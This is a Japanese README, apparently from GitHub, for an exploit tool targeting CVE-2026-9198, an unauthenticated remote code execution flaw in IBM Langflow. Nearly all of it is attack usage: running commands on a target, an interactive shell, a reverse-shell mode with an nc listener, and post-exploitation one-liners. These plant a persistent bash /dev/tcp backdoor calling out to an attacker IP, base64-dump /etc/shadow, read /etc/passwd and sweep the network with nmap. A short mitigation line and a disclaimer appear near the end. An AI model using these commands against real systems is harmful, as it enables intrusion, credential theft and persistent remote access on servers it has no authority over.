
IBM Langflow 自動ログインバイパスを介した未認証RCE
CVE-2026-9198 は、IBM Langflow OSS における重大な未認証リモートコード実行 (RCE) 脆弱性です。このエクスプロイトは、以下の2つの脆弱性を連鎖させます:
/api/v1/validate/code エンドポイントにおけるコードインジェクション⚠️ 警告: このツールは、許可されたセキュリティテストおよび教育目的のみに使用してください。無断使用は違法です。
pip パッケージマネージャーgit clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198
pip install termcolor
または、すべての依存関係を一度にインストールします:
pip install -r requirements.txt
python CVE-2026-9198.py --help
すべての利用可能なオプションを含むヘルプメニューが表示されるはずです。
ターゲット上で単一のコマンドを実行します:
python CVE-2026-9198.py -t <target_ip> -c "id"
例:
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"
動的プロンプトを備えた対話型シェルを起動します:
python CVE-2026-9198.py -t <target_ip> --shell
機能:
user@host と現在のディレクトリを表示する動的プロンプトcd コマンドのサポートセッション例:
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp
リスナーにリバースシェルペイロードを送信します:
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>
例:
# On your machine - Start listener
nc -lvnp 4444
# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444
Langflow がデフォルト以外のポートで実行されている場合:
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"
例:
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"
自動ログインプロセスをスキップして、既存のトークンを使用します:
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"
低速ネットワーク向けに HTTP タイムアウトを調整します:
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"
この脆弱性から保護するには:
/api/v1/auto_login および /api/v1/validate/code への異常な API リクエストを監視するこのツールは、教育および許可されたセキュリティテストの目的のみで提供されます。作者は、本ソフトウェアの誤用または損害について一切の責任を負いません。利用者は、適用される法令を遵守する責任を負います。
このプロジェクトは MIT ライセンスの下で提供されています。詳細については LICENSE ファイルを参照してください。
0xgh057r3c0n
コントリビューションを歓迎します! お気軽にプルリクエストを送信してください。
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)このツールが役に立つと思われた場合は、GitHub で ⭐ を付けていただけると幸いです!
| 引数 | 説明 | 必須 | デフォルト |
|---|
-t, --target | ターゲットのホスト/IP または完全な URL | ✅ はい | - |
-p, --port | Langflow のポート | ❌ いいえ | 7860 |
-c, --cmd | 単一のコマンドを実行 | ❌ いいえ | "id" |
--shell | 対話型擬似シェルモード | ❌ いいえ | False |
--lhost | リバースシェルリスナーの IP | ❌ いいえ | - |
--lport | リバースシェルリスナーのポート | ❌ いいえ | 4444 |
-k, --token | 指定されたベアラートークンを使用 | ❌ いいえ | - |
--timeout | HTTP タイムアウト (秒) | ❌ いいえ | 20 |
--no-banner | バナーを非表示 | ❌ いいえ | False |